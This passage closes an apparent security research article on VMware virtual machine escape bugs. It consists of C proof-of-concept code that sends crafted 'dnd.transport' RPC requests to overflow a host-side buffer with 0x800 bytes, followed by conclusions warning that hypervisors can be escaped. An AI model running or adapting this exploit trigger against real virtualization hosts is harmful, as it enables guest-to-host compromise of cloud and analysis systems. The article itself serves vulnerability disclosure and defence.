    char req3[0x80] = "dnd.transport ";
    n = strlen(req3);
    *(int*)(req3+n) = 3;
    *(int*)(req3+n+4) = 0;
    *(int*)(req3+n+8) = 0x100;
    *(int*)(req3+n+0xc) = 0;
    *(int*)(req3+n+0x10) = 0;
    // allocate buffer of 0x100 bytes
    RpcOut_SendOneRaw(req3, n+0x14, NULL, NULL);

    char req4[0x1000] = "dnd.transport ";
    n = strlen(req4);
    *(int*)(req4+n) = 3;
    *(int*)(req4+n+4) = 0;
    *(int*)(req4+n+8) = 0x1000;
    *(int*)(req4+n+0xc) = 0x800;
    *(int*)(req4+n+0x10) = 0;
    for (int i = 0; i < 0x800; ++i)
        req4[n+0x14+i] = 'A';
    // overflow with 0x800 bytes of 'A'
    RpcOut_SendOneRaw(req4, n+0x14+0x800, NULL, NULL);
}

Conclusions

In this article we presented several VMware bugs leading to guest to host virtual machine escape.
We hope to have demonstrated that not only VM breakouts are possible and real, but also that a determined attacker can achieve multiple of them, and with good reliability.
We feel that in our industry there is the misconception that if untrusted software runs inside a VM, then we will be safe.
Think about the malware industry, which heavily relies on VMs for analysis, or the entire cloud which basically runs on hypervisors.
For sure it’s an additional protection layer, raising the bar for an attacker to get full compromise, so it’s a very good practice to adopt it.
But we must not forget that essentially it’s just another “layer of sandboxing” which can be bypassed or escaped.
So great care must be taken to secure also this security layer.